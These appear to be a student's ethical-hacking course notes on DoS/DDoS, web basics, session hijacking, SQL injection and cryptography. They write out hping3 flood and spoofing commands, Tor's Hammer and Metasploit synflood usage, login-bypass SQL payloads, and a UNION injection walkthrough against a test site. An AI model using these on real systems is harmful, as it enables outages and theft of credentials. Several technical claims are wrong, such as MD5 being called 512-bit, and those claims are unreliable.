1100unavailability of a service that’s normally available
1101DOS : originates from single source
1102[[ref. dos image ]]
1103
1104DDOS : distributed DOS
1105originates from a network of many sources, often many thousands. In simple terms, the best way to define a DDoS attack is that it’s a DoS attack originating from many different distributed attack sources (IP addresses).
1106do much more harm than a simple Denial of Service attack. That’s because it often involves way too many attack sources
1107
1108Botnet: machines on the internet that are compromised and controled from a control centre
1109 n/w of compromised hotes ---> executes commands on order of c comand and control centre
1110
1111Effects :
1112financial loss
1113loss of customers
1114n/w disabled
1115organisation disabled
1116
1117Techniques :
1118syn flooding
1119service rqst flood
1120icmp flooding
1121
1122syn flood: sending tcp syn segments to open ports
1123 server replies with syn/ack to spoofed source
1124 half open connection is created and soon becomes maxed out
1125 resulting server can not access any more new connections
1126server overwhelmed, legitimate traffic dropped, because server starts allocating resources for open connections and gets exhausted after a certain limit
1127[[ref syn flooding image ]]
1128
1129Service Request Flood
1130Valid Sources: create many open connections to a service
1131full handshake happens
1132can be intended or unintentional as well
1133goal is to exhaust the server resource.
1134example: server overload during exam results
1135
1136ICMP flooding / ping flood
1137many icmp rqst echo rqst --> icmp echo reply
1138spoofed source ip address .
1139resulting in overwhelming the target resource
1140[[ ref icmp flood img]]
1141
1142Tools :
1143are out there to use but are still illegal to use
1144>loic : low orbit ion cannon : a n/w stress test app
1145>hulk: http unbearable load king
1146>xoic: xoicdoser.
1147>tor's hammer : ability to use tor to annonymize the source [demo included]
1148>php dos --> ddos php script
1149>ddosim : lay 7 simulator
1150>golden eye : https://github.com/jseidl/GoldenEye
1151> metasploit for dos [demo]
1152
1153during pentest contract you need to explicitly tell before doing a dos because critical infrastructre is at risk .
1154
1155Detection
1156activity profiling
1157abnormal bump in incoming data can be seen
1158
1159countermeasure strategies:
1160waf : eg cloudflare /akamai
1161degrade: stop non-critical services
1162 let's say we were serving 10 services
1163shutdown: disable the services under attack
1164 accept the defeat, shutdown everthing, wait for it to pass away.
1165
1166deflect attack using honeypots
1167honeypot : a system deployed to attract targets
1168 logs and provied info about attackers -source and software
1169
1170Tools for DDOS protection
1171ddos defend :::: https://www.dosarrest.com/
1172fort guard ddos firewall :::: http://www.fortguard.com/
1173anti ddos guardian :::::: http://anti-ddos.net/
1174defense pro :::: https://radware.com/
1175wan guard :::: https://www.andrisoft.com/
1176
1177---------------------------------------------------------------------------------------------------------------------------
1178Tor's Hammer
1179https://github.com/dotfighter/torshammer
1180git clone
1181./torshammer.py -t <$ip> -p <$target port> -r <threads >
1182
1183python torshammer.py -t 192.12.3.12 -p 80
1184
1185 -t target ip
1186-p dest .port no. [running http server]
1187-r threads default 256 if nothing is given
1188-T to anonymize
1189---------------------------------------------------------------------------------------------------------------------------
1190hping3
1191 aka ping of death
1192hping3 -S -p 8080 -V <$targetip >
1193hping3 -S -p 8080 --flood -V <$targetip >
1194hping3 <$targetip> --flood
1195hping3 -c 40000 - d 128 -S -w 64 -p 8000 --flood --rand-source 192.168.1.14
1196 -c count of packets
1197 -d size of each packet
1198 -S for syn packet
1199 -P psh
1200 -R rst flag
1201 -A ack flag
1202 -U urg flag
1203 -F fin flag
1204 -w for tcp window size
1205 -p for port
1206 --flood
1207 --rand-source to randomize source address
1208 -1 --> icmp mode
1209 -a spoof source host
1210 -V verbose
1211---------------------------------------------------------------------------------------------------------------------------
1212metasploit for dos
1213
1214msfconsole
1215>use auxiliary/dos/tcp/synflood
1216>show options
1217>set rhost 10.10.32.12
1218>set rport 21
1219>set shost 10.12.23.2 [not required spoofing the source address]
1220>set timeout 30000
1221>exploit
1222
1223can see performance graph in task manager
1224
1225
1226
1227
1228
1229WEB APP BASICS
1230
1231
1232
1233WEB ARCHITECTURE AND COMPONENTS
1234============================================
1235
12361. Domain Name : Its tough for a user to remember the IP address of a website so these websites are assigned with a domain name such as google.com , facebook.com etc etc.
1237 So in order to open or access the website one has to visit the domain name.
1238
12392. Web Hosting Space : The space which helps in storing the webpages or scripts which helps in running a website are known as hosting spaces. Eg. GoDaddy, BigRock
1240ICANN provide these hosting spaces to Godaddy etc.
1241
1242 web hosting --> hosting = home of website shared hosting / dedicated hosting
1243 we purchase the physical disk space at the server and the bandwidth(how much traffic can come in n go ), access to control panel UI based to manage your hosting (eg. cpanel)
1244
1245
12463. Operating Systems : On which Operating System we want to build our website or host our website. Eg. Linux, Windows
12474. Server Type : Which type of server we are using to host our website. Request and Response of the application.
1248 Windows - IIS - Information Server
1249 Linux - Apache Tomcat
1250
1251difference btwn os n server {{{
1252Operating System:
1253An operating system is a set of programs that coordinates all the activities among computer hardware devices. It provides a means for users to communicate with the computer and other software.
1254Many of today’s computers use Microsoft’s Windows, the latest version of Windows, or Mac OS, Apple’s operating system.
1255When a user starts a computer, portions of the operating system are copied into memory from the computer’s hard disk. These parts of the operating system remain in memory while the computer is on.
1256Server:
1257A server controls access to the hardware, software, and other resources on a network and provides a centralized storage area for programs, data, and information.
1258Servers support from two to several thousand connected computers at the same time. People use personal computers or terminals to access data, information, and programs on a server.
1259A terminal is a device with a monitor, keyboard, and memory.
1260
1261little more simplified :
1262Server platform can provide features like:
1263
12641) unlimited user connections
12652) use of large amounts of memory
12663) can act as web server, database server, email server and other server-like roles
12674) optimized for network, instead of local application execution
12685) extended management
12696) extended fault tolerance to avoid downtimes
12707) can hold a domain
12718) expensive
1272
1273Client platform can provide features like:
1274
12751) running client applications faster, like Office, Photoshop, Games
12762) easy access to web services, like email, browsing, searching
12773) rich media services
12784) easy to use for non-expert users
12795) can work on a domain as a member (professional edition only - home edition cannot join a domain)
12806) rich connectivity support (lan, wireless, bluetooth, etc)
12817) cheaper than the server version
1282
1283Server is mainly to handle numerous Desktop which itself could be quite clear in itself about the difference b/w them.
1284The feel of GUI in Desktop is much more friendly to that of Server OS which makes it easier for the mass to use and adapt it to their daily life.
1285 On the other hand, Server OS is not to be used by general people, only experts work on it.
1286
1287
1288Server is OS which always responds to the requests of clients.
1289Clients are those which only requests to the server.
1290
1291}}}
1292
1293
12945. Web Technology : The technology we use in buliding a website like the programming languages, the plugins, various scripting languages etc.
1295To check what technology a site is using :
1296Visit : builtwith.com, wappalyzer, whatweb linux cli
1297
1298 1. Client Side Scripting Language : Which is used to develop the Front End Application and the user only accessing the control menu of that Programming Language.
1299 Eg. HTML , Java etc.
1300
1301 2. Server Side Scripting Language : THese are those languages which are used for creating and maintaing server side configuration of a website.
1302 Eg. PHP, ASP, JSP, PYTHON etc.
1303
1304
13056. Database : Database is that system which stores all the data of a web application we are hosting in a server. It is known as the backbone of the web application.This data could be anything like username ,password , messages , comments etc.
1306It helps in storing all the files situated in a database.
1307Windows - MSSQL
1308Linux - MySQL
1309
1310
1311 S Q L
1312 Structured --> Means a uniform storage like in the form of tables
1313 Query --> The data stored in the table can be retreived through some queries these queries could be like :
1314 Select * from <tablename>;
1315-------------------------------------------------------------------
1316
1317Local Hosting
1318=============
1319Local Hosting is a technology in which we stores and hosts a Database in our "localhost" Computer. This website can be hosted and accessed in a LAN or a Intranet Network.
1320Can be assessed from the hosted computer by three ways:
13211. 127.0.0.1/WEBSITE_NAME
13222. localhost/WEBSITE_NAME
13233. <private ip>/WEBSITE_NAME
1324
1325
1326LOCAL HOST SERVERS
1327==================
1328So, they are Server applications which makes our normal operating system and make them act like a server.
1329
1330WINDOWS - WAMPP
1331
1332W - WINDOWS
1333A - APACHE
1334M - MSSQL
1335P - PERL
1336P - PYTHON
1337
1338LINUX - LAMMP
1339
1340L - LINUX
1341A - APACHE
1342M - MYSQL
1343P - PERL
1344P - PYTHON
1345
1346XAMPP - Cross Platform Server
1347X - Cross Platform
1348A - APACHE
1349M - MYSQL
1350P - PERL
1351P - PYTHON
1352
1353
1354Webservers
1355
1356Market share of varous webservers as per netcraft
1357[ref. to graph ]: - https://news.netcraft.com/archives/category/web-server-survey/
1358
1359hackers will go after more percentage---> more popular --> increasing probability for attack
1360quick defensive tip : use lesser known web servers
1361
1362why attacked :
1363they are available via internet
1364server attack vectors available :
1365 server
1366 web apps
1367 database
1368if compromised then may be able to gain access to usr and admin accounts
1369some server vuln can be like :
1370 server settings
1371 poor passwords
1372 applications security holes
1373 no authentication
1374 unpatched servers
1375 mis configured security settings
1376 un necessary services runnning
1377
1378all these may lead to access to :- {
1379 sensitive data
1380 access to user a/c
1381 defacement of website --> changing the contents of the website
1382 launch secondary attack
1383
1384
1385
1386
1387
1388
1389
1390SESSION HIJACKING
1391
1392session hijacking,
1393
1394sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access
1395
1396session creation how ?
1397
1398session mgmt attacks
1399token generation
1400prediction :- requires sniffing --> attempts to guess next token
1401
1402to easily create, edit and delete a cookie for the current page.
1403
1404what is a cookie ?
1405cookie ??
1406A cookie is a message given to a web browser by a web server. The browser stores the message in a text file. The message is then sent back to the server each time the browser requests a page from the server
1407information is packaged into a cookie and sent to your browser which stores it for later use.
1408
1409used for tracking the user, personlization, session mgmt
1410not a security risk until some gets access to them.
1411
1412stores session id in the cookie ...once you login session id is generated and stored in cookie ...
1413 cookie have alive time : can be for the lifetime of the browser, for certain amount of time, stays irrespective of browser closes or not.
1414
1415
1416web server only matches the session id
1417wireshark/burp suite can be used to see the session id being sent backand forth
1418modify headers using
1419cookies manager + firefox plugin
1420
1421Cookies have parameters that can be passed to them:
1422
1423 The name of the cookie.
1424 The value of the cookie.
1425 The expiration date of the cookie: this determines how long the cookie will remain active in your browser.
1426 The path the cookie is valid for. Web pages outside of that path cannot use the cookie.
1427 The domain the cookie is valid for. This makes the cookie accessible to pages on any of the servers in a domain.
1428 The need for a secure connection: this indicates that the cookie can only be used under a secure server condition.
1429
1430auth_token= 124124csnwn12412niniwen2
1431
1432twitter auth token example :
1433https://packetstormsecurity.com/files/119773/twitter-cookie.txt
1434
1435
1436[[ ref. session hijacking image]]
1437
1438cookie manager for firefox:
1439 https://addons.mozilla.org/en-US/firefox/addon/a-cookie-manager/
1440cookie editor for firefox:
1441 https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
1442for chrome :
1443 https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en
1444
1445Cookies folder location in Windows 10/8/7
1446
1447To see where Internet Explorer stores its Cookies in Windows 10/8.1/8/7/Vista, open Explorer > Organize > Folder Options > Views > Check ‘Do not show hidden files and folders’ and Uncheck ‘Hide protected OS files‘ > Apply > OK.
1448
1449Now you will be able to see the two real locations of Windows Cookies folders at the following address in Windows 7:
1450• C:\Users\username\AppData\Roaming\Microsoft\Windows\Cookies
1451• C:\Users\username\AppData\Roaming\Microsoft\Windows\Cookies\Low
1452In Windows 8 and Windows 8.1, the Cookies are stored in this folder:
1453• C:\Users\username\AppData\Local\Microsoft\Windows\INetCookies
1454In Windows 10 you may open Run box, type shell:cookies and hit Enter to open the Cookies folder. It is located here:
1455• C:\Users\username\AppData\Local\Microsoft\Windows\INetCookies
1456
1457Prevent Session Hijacking
1458encrypt end to end : session id if encrypted then attacker would not be able to use it.
1459this puts additional load on the web server,
1460Preventions implemented on server side
1461Session to be regenerated again within few min.
1462Session id to be expired after certain interval of time.
1463
1464
1465Login -- using browser -- js run on browser -- Facebook server -- authorized user -- session generated -- session id created (uid/sid/sess_id) -- saved in cookies -- client side --
1466
1467
1468Https rqst -->
1469
1470Https reply + set cookies <--
1471
1472Https rqst + cookies-->
1473
1474Cookies -- small text files -- username paswd not stored -- only session id is stored can be encrypted or plain text
1475
1476Cookie used to track user who has authenticated
1477
1478Server sends back session cookie
1479
1480Cookies sent in Http header or explicitly included in a hidden field
1481Generated by server stored by client
1482
1483
1484If the algorithm to create new session id is easy and predictable then attacker can generate the session id - guess the session if not properly randomized
1485
1486{
1487
1488Sniffing the n/w and capture cookie in transit
1489
1490
1491DNS cache poisoning :- tricking the user that you are facebook.com and the cookie is then going to be sent to you.
1492
1493
1494} - n/w based attacks -Encrypted connections can avoid these attacks
1495
1496
1497What Is a CMS?
1498================
1499
1500A Content Management System(CMS), is a system that allows you to manage information easily and effectively. The information could be anything, whether it’s a simple article or a complex media management system.
1501It’s for non-technical users based system that allows them organize content easily and makes the process easily rather than hectic. In any web-based application, there are three basic operations
1502
1503--> Add
1504--> Edit
1505--> Delete
1506
1507Example: Wordpress , Joomla , drupal, magento etc...
1508
1509
1510
1511
1512
1513
1514SQLI
1515
1516
1517
1518
1519SQL injection what it is ? theory
1520
1521https://www.w3schools.com/sql/sql_union.asp
1522user---> web app ---> keywords / creds ---> webapp--->creds --> DB --> query the DB --> match --existing creds in DB --> if match is found ---> access granted
1523input parms ---> inputs his creds --->
1524input parms ---> malicous sql query -->
1525DB -----> multiple tables ----> fetch data from tables
1526
1527> By SQL Injection, an attacker could bypass authentication, access, modify and delete data within a database.
1528In some cases, SQL Injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to more damaging attacks inside of a network
1529that sits behind a firewall.
1530
1531types of sql injection
1532
1533boolean based injection
1534
1535select city, country from customers;
1536 ^ colu ^mn name ^ table name
1537
1538sample query to understand behind the scenes working :
1539>>>>Executed SQL query when username is tom and password is jerry:
1540
1541SELECT * FROM users WHERE name='tom' and password='jerry'
1542 ^ tablename ^ creds =
1543
1544
1545explanation
1546When a user enters a user name and password, a SQL query is created and executed to search on the database to verify them.
1547The above query searches in the users table where name is tom and password is jerry . If matching entries are found, the user is authenticated.
1548
1549and means both needs to be true
1550
1551using ======== ' or 1='1
1552 'or '1'= '1
1553
15541=1 ---> true
1555
1556' '
1557
1558 true or false ---> true
1559false or true ---> true
1560false or false ---> false
1561true or true --> true
1562
1563SELECT * FROM users WHERE name= ' ' or '1'= '1 ' and password= ' jeery '
1564
1565-- -
1566--+
1567
1568SELECT * FROM users WHERE name= ' ' or '1'= '1 ' and password= ' jeery '
1569
1570SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
1571
1572The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.
1573
1574another way [introducing comment ]
15751' or 1=1 -- - blah
1576SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
1577
1578
1579
1580
1581SELECT * FROM users WHERE name= (' tom ') and blafalmglwgw
1582>sql injection cheatsheet and kinds
1583
1584https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
1585
1586
1587
1588
1589
1590Union base injection...
1591step bye step..Execution
1592
1593demo website : http://testphp.vulnweb.com/artists.php?artist=1
1594categories--> posters /paintings
1595
1596
1597
15981.first get the GET METHOD get something=something
1599ex: php?id=0/1
1600php?cat=1
1601
16022.exception handling_use a ' cort to check if the link the link is vulnerable or not
1603
16043. use 'order by' FUNCTION to find the number of columns in the database
1605ex: php?cat=1 order by 99--+
1606if error means there is no column
1607if no error or there is data there column is present
1608order by 12 --+
1609
1610we got to know 11 columns
1611
1612
16134.union to display all the table name
1614ex: php?cat=-1 union select 1,2,3,....--+ (all the number of tables should be present )
1615ex: if there are 99 tables then you have to type upto ....97,98,99--+
1616
1617http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20--+
1618 ^ making the query true and false by using - to generate the error
1619we get the vuln columns
1620
1621
1622
1623inject ur query there
16242,9,7,11
1625
1626
1627
1628
1629
1630
1631
1632
16335. find database and version
1634
1635
1636
1637
1638
1639
1640
1641
1642
1643
1644database() = acuart
1645version() = 5.1.73-0ubuntu0.10.04.1
1646
1647
1648
1649
1650information_schema= information ki maaa= mother of all information
1651
1652
1653
1654
16556.find tables
1656ex: php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database()--+
1657
1658
1659tablenames = users, categ, products, artists, ^
1660
1661database = acuart ---> tables (12rwwfwfwfwefw) ----> users table -----> ( cc, address, uname, pass, phone, )
1662
1663
1664
16657.find columns
1666ex: php?cat=-1 union select 1,2,3,4,5,6,column_name,8,9,10,11 FROM information_schema.columns where table_name='users'--+
1667
16688. extract data
1669
1670ex: php?cat=-1 union select 1,2,3,4,5,6,pass,8,9,10,uname from users--+
1671
1672
1673
1674
1675
1676
1677
1678
1679
1680
1681
1682CRYPTO
1683
1684cryptology --> crypt analysis + crypt ography
1685The science of making and breaking the algorithms
1686
1687TERMINOLOGIES
1688
1689Plain Text : A text which is created and readable by the individuals only.
1690Cipher Text : It is the encrypted text, which is converted by applying an algorithm on the plain text.
1691Encryption : Process of converting a plain text to cipher text.
1692Decryption : Process of converting a cipher text to plain text.
1693
1694Crypt: Hidden/ Secret/Vault
1695Graphy: Writing
1696art of converting PT into CT using algoritham is cryptography
1697PT=
1698CT=
1699algo = set of pre defined rules/ f(n)s
1700
1701crypt analysis : the science of predicting the alog and breaking it.
1702
1703plain text ---> algo+ key -----> cipher
1704 ^^^^^ ------> decrypt ----> key + algo ---> PT
1705 ^^^^^ ------->cryptanalysis ------->PT
1706
1707why Cryptography ?
1708provides :
1709 Non Repudiation
1710 Confidentiality /Security
1711 Integrity
1712 Authentication
1713where ?
1714 emails
1715 chats
1716 PII- Personal identifiable info.
1717 Credit Card No.
1718 Tax Info.
1719 Sensitive Info.
1720
1721Cryptography types:
1722 symmetric
1723 asymmetric
1724 hashing
1725
1726
1727Classical Cipher Types:
1728 Transpostion Cipher: letters are shifted and rearranged
1729
1730 Rail Fence Cipher (key less Cipher ), Row Transpostion Cipher, combined, double transposition
1731
1732 Substituion Cipher: letters are replaced with cipher text
1733
1734 Polyalphabetic: multiple alphabetic substituion
1735 Playfair cipher, Vigenere Cipher, one time pad(vernam cipher), hill cipher,
1736 Mono Alphabetic:
1737 additive cipher, multiplicative ciphers , affine cipher
1738 eg. ROT13, Caesar Cipher, DES, triple DES , AES
1739a 1
1740b2
1741c3
1742d4
1743e5
1744f6
1745-
1746-
1747z 26
1748
1749key = 2
1750
1751abca (plain text)-----> key =2 ------> cdec (cipher text)
1752
1753
1754
1755
1756
1757Ciphers based upon input type
1758 1. stream cipher: encrypts continuos streams of data - basically bit by bit
1759 2. block cipher: encrypts blocks of data of fixed size
1760
1761Ciphers based upon key
1762
1763 Symmetric : Private key Enc.
1764 single key used to enc and decrypt.
1765 DES : data encryption std.
1766 algoritham designed to encrypt 64 bit blocks of data
1767 >> same key is used to encrypt all the blocks of data one by one
1768 >> takes input of fixed 64 bit block length and gives output of 64bit
1769 >> DES uses 56 bit key size : too small to protect
1770 >> succesors : - triple DES,
1771
1772
1773Asymmetric Encryption
1774 2 key pairs Public and Pvt keys
1775Alice ==> Apub, Apvt
1776Bob ==> Bpub, Bpvt
1777alice --> pt --> B pub -----------------CT-------------sent to Bob -------------CT-------------> Bpvt--->PT---->BOB
1778
1779examples :
1780RSA
1781It was designed by Ron Rivest, Adi Shamir and Leonard Adleman in 1977
1782Key has usually length of about 1000 to 4000 bits
1783for more technical info. http://www.crypto-it.net/eng/asymmetric/rsa.html?tab=3
1784
1785
1786 Differences
1787 Symm | Asymm
1788Keys : 1 pvt key | 2 Public, pvt
1789Speed: fast | Comparitively Slow
1790Example: AES,DES,3DES, RC4 | RSA, Diffie-Hellman, DSA
1791
1792
1793
1794
1795
1796
1797
1798
1799Hashes
1800======
1801It converts data into either alpha numeric form or in hex form. But there is a difference between a cipher encryption and a hash. The difference is encrypted text can be reverted and further decrypted,
1802 but hashes cannot be reverted.
1803Hash function is that which takes an input and returns a fixed-size alphanumeric string. The string is called the hash value. Examples MD5 Hash, sha etc.
1804
1805EG. alphanumeric - scusege67dg367df7fd3fd37f3636d
1806
1807MD5 Examples :
1808
1809a > 0cc175b9c0f1b6a831c399e269772661
1810aaaa 594f803b380a41396ed63dca39503542
1811
1812
1813HASHES FORMATS
1814================
1815hashing algorithm is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length digest value
1816
1817
18181. MD5 (Message Digest 512 bit)
1819used as a checksum to verify data integrity,
1820designed by Professor Ronald Rivest of MIT (Rivest, 1992)
1821
1822It will convert the plain text into hexadecimal text of fixed length. It always creates a unique hash for the plain text and are normally shown in their 32 digit hexadecimal value equivalent. -128bit output
1823
1824
18252. SHA1
1826secure hashing algo
1827 takes an input and produces a 160-bit (20-byte) hash value known as a message digest – typically rendered as a hexadecimal number, 40 digits long.
1828 now replaced with SHA-256 or SHA-3 -- 64 digits to represent 256 bits output
1829
1830online checksum calculate : http://onlinemd5.com/
1831
1832using powershell to computer check sums
1833shift + right click --> open powershell here
1834> Get-FileHash $.\filename.txt -Algorithm SHA256
1835-Algorithm MD5
1836-Algorithm SHA1
1837
1838
1839PGP : Pretty Good Privacy
1840provides cryptographic privacy and authentication for data communication.
1841PGP is used for
1842signing,
1843encrypting, and
1844decrypting texts, e-mails, files
1845focused to increase the security of e-mail communications.
1846How PGP works
1847
1848Pretty Good Privacy uses a variation of the public key system. In this system, each user has an encryption key that is publicly known and a private key that is known only to that user.
1849You encrypt a message you send to someone else using their public key. When they receive it, they decrypt it using their private key.
1850Since encrypting an entire message can be time-consuming,
1851PGP uses a faster encryption algorithm to encrypt the message and then uses the public key to encrypt the shorter key that was used to encrypt the entire message.
1852Both the encrypted message and the short key are sent to the receiver who first uses the receiver's private key to decrypt the short key and then uses that key to decrypt the message.
1853
1854hush mail offers a Web-based encrypted email service powered by OpenPGP
1855https://www.hushmail.com/
1856
1857STEGANOGRAPHY
1858================
1859Steganography is a process in which we basically hide a data inside a data. This is the process in which the data is hidden into the Plain Sight or a Image, Audio or a Video file.
1860This process can also be used along with cryptography as an extra-secure method in which to protect data.
1861
1862XIAO for stegano
1863https://download.cnet.com/Xiao-Steganography/3000-2092_4-10541494.html